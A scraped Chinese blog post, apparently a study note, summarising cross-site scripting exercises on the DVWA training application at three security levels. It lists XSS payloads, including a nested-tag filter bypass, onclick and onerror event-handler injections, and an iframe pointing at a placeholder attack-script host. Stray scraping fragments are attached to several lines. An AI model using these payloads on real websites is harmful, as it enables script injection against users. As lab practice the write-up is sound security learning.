DVWA的Xss跨站總結
Xss跨站總結
初級防禦的代碼
Poc:<script>alert(1)</script>xss
上圖防禦的代碼 爲輸入的結果就爲輸出的結果spa
中級防禦的代碼
Poc:<scri<script>pt>alert(1)</script>blog
上圖爲輸入的文本中只要包含<script>就給替換成空ip
解決思路:<scri<script>pt>alert(1)</script> 在<script>中再添加一個<script> 後添加的<script>替換爲空可是外面的<script>依舊能夠拼接起來。iframe
高級防禦的代碼
圖上爲只要包含script就替換掉cli
解決方法:方法
<a href=」 onclick=alert(‘xss’)>zet</a> #建立一個點擊鍵zet點擊後執行onclick=alert(‘xss’)im
<img src=http://172.16.1.23/a.jpg onerror=alert(‘xss’)> #當錯誤時執行alert(‘xss’)error
<iframe width=300 height=100 src=」http://攻擊腳本地址」></iframe>總結
相關文章
- 1. XSS跨站腳本小結
- 2. xss跨站***
- 3. DVWA的使用5–XSS(Reflected)(反射型跨站腳本)
- 4. DVWA的使用6--XSS(Stored)(存儲型跨站腳本)
- 5. XSS跨站腳本攻擊——在DVWA中的練習
- 6. dvwa-xss
- 7. DVWA XSS
- 8. DVWA-xss
- 9. XSS--DVWA
- 10. 【DVWA】XSS
- 更多相關文章...
- • Docker 資源彙總 - Docker教程
- • XML 總結 下一步學習什麼呢? - XML 教程
- • 算法總結-雙指針
- • 算法總結-回溯法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 「插件」Runner更新Pro版,幫助設計師遠離996
- 2. 錯誤 707 Could not load file or assembly ‘Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKe
- 3. Jenkins 2018 報告速覽,Kubernetes使用率躍升235%!
- 4. TVI-Android技術篇之註解Annotation
- 5. android studio啓動項目
- 6. Android的ADIL
- 7. Android卡頓的檢測及優化方法彙總(線下+線上)
- 8. 登錄註冊的業務邏輯流程梳理
- 9. NDK(1)創建自己的C/C++文件
- 10. 小菜的系統框架界面設計-你的評估是我的決策
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. XSS跨站腳本小結
- 2. xss跨站***
- 3. DVWA的使用5–XSS(Reflected)(反射型跨站腳本)
- 4. DVWA的使用6--XSS(Stored)(存儲型跨站腳本)
- 5. XSS跨站腳本攻擊——在DVWA中的練習
- 6. dvwa-xss
- 7. DVWA XSS
- 8. DVWA-xss
- 9. XSS--DVWA
- 10. 【DVWA】XSS